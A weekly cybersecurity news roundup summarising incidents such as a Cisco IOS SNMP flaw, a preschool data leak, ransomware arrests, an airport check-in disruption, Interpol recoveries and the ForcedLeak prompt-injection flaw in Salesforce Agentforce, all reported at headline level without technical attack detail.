Major Flaws, Disruptive Attacks, And Coordinated Takedowns Shaped A Week Of Cyber Threats And Decisive Responses

This week’s cybersecurity stories cover a wide range of incidents. We saw fresh software flaws with global impact, and data leaks targeting vulnerable communities. Investigations into major attacks led to arrests, while global law enforcement coordinated takedowns of cybercrime groups. 

Financial theft, digital fraud, and disruptions to air travel shed light on cyberattacks that affect daily life. The week also showed that law enforcement crackdowns remain central to response efforts.

Read on for the top cybersecurity news.

Critical Cisco SNMP Vulnerability in IOS and IOS XE Software Could Allow Remote Code Execution

Cisco warned customers of a serious SNMP flaw affecting IOS and IOS XE software. Attackers could exploit the weakness to gain remote code execution, putting routers and switches at risk worldwide. Devices running exposed configurations are especially vulnerable. Cisco confirmed no workarounds exist, urging administrators to install patches immediately.

The flaw highlights persistent risks in core networking gear. Customers relying on Cisco infrastructure face urgent updates to avoid disruption and possible remote compromise.

Hacker Gang Claims Breach of Preschool, Posts Child Profiles and Family Contact Details on the Dark Web

A hacker gang claimed it breached a preschool system and posted sensitive child and family records on the dark web. The Radiant Group ransomware gang has claimed responsibility for the Kido International Preschool & Daycare cyber attack. 

The data allegedly included photos, addresses, and parent contacts, sparking widespread outrage. Security experts warned that such breaches create risks of extortion and identity theft targeting families. Law enforcement is investigating the claims as parents demand answers from the institution.

UK Arrest Made in Collins Aerospace Ransomware Attack Investigation

British police arrested a suspect linked to the ransomware attack on Collins Aerospace, a critical defense and aviation contractor. The ransomware incident disrupted company systems and prompted urgent responses from authorities concerned about national security exposure. 

Investigators traced digital evidence leading to the suspect’s arrest, though further arrests are expected. The incident highlights cross-border cooperation as police continue to pursue actors behind attacks threatening global defense supply chains.

Secret Service Dismantles Major Telecommunications Threat in New York

The U.S. Secret Service dismantled a large-scale telecommunications fraud operation in New York. Officials reported the group ran illegal schemes, causing millions in financial losses. Authorities seized equipment used to bypass legitimate networks and reroute calls for profit. 

The takedown followed months of surveillance and international coordination, reflecting growing threats from telecom-based fraud. Investigators said the operation was linked to organized crime networks abroad.

Hacker Drains Cancer Patient’s $32K Treatment Fund Through Fake Steam Game, Outraged Community Hunts Him Down

A hacker tricked a cancer patient into losing about $32,000 meant for their treatment by using a fake Steam game scam. Targeted by a malicious crypto theft, the attack sparked outrage from community members and a volunteer-led hacker investigation.

Cybersecurity professionals and OSINT specialists traced the alleged hacker who did so to buy expensive watches and sports cars. The malicious game has been removed from Steam. Within days, the community identified the suspect and restored the stolen amount. 

European Airports Face Disruption, Check-In Systems Issues After Cyberattack

Airports across Europe experienced check-in disruptions after a cyberattack. Passengers faced delays and cancellations while staff were forced to use manual processes. Officials confirmed systems were gradually restored. 

Travelers were forced to halt and reschedule as flights were interrupted. The incident originated in the Collins Aerospace MUSE system, which is a software platform used for passenger check-in, boarding, and baggage handling.

Interpol Operation Recovers Approximately $440 Million in Global Crackdown

Interpol announced a crackdown leading to the recovery of $440 million from global cyber-enabled crime networks. The operation spanned 40 countries and focused on money laundering and online scams. 

Investigators froze bank accounts linked to cybercrime operations named Operation HAECHI VI. The effort is one of the largest coordinated financial recovery campaigns to date. Authorities pledged further collaboration against cross-border cybercriminal syndicates.

ForcedLeak Vulnerability in Salesforce Agentforce Exposed CRM Data Through Indirect AI Prompt Injection

Researchers disclosed the ForcedLeak vulnerability affecting Salesforce’s Agentforce AI-driven CRM tool. The flaw allowed attackers to use indirect prompt injection to force data leaks from corporate systems. 

Sensitive CRM records, including customer and sales data, could be exposed without direct system access. Salesforce addressed the issue with urgent fixes and urged customers to validate deployments. The fix prevents Agentforce agents from sending output to untrusted URLs. 

Scattered Spider Suspect Arrested in Las Vegas Following Surrender

Authorities confirmed the arrest of a suspected member of Scattered Spider, the hacking group linked to major ransomware attacks. The suspect surrendered in Las Vegas following pressure from investigators. 

Scattered Spider has targeted casinos, telecoms, and corporate networks with social engineering and ransomware tactics. Although disrupting one operator will not dismantle the group, it demonstrates progress in ongoing international investigations into high-profile cybercrime networks.

Expert Comment on Cloud-Delivered Threats:

“These massive ecosystems, and the fact that most employees trust what they find in them, make it easier for attackers to hide malware and compromise employees and organisations. The winning trifecta to defend against cloud-delivered threats is ‘inspection, detection, protection’. 

That includes building the capability to inspect all traffic to and from cloud applications in real-time, including decrypting SSL/TLS traffic to inspect file contents. Advanced Threat Protection can detect high-risk files and automatically hold and inspect them in a sandbox environment before they can be downloaded to a user's device. 

Finally, cloud-native DLP can prevent employees from uploading sensitive data to unapproved cloud storage instances, limiting the data that can be exfiltrated and broadly reducing the risk associated with unapproved app use.”

— Ray Canzanese, Director of Netskope Threat Labs

The Impact and What’s Ahead

This week's cybersecurity landscape was a reflection of attacks targeting companies, airports, and individuals. Yet as we witness cybercrimes, law enforcement scores major wins with arrests and multimillion-dollar recoveries. 

It is encouraging that takedowns and global cooperation continue to dismantle criminal infrastructure. Cybercrime remains a challenge, but every single crackdown reinforces collective resilience. There is more defensive action unfolding than criminals would like us to believe.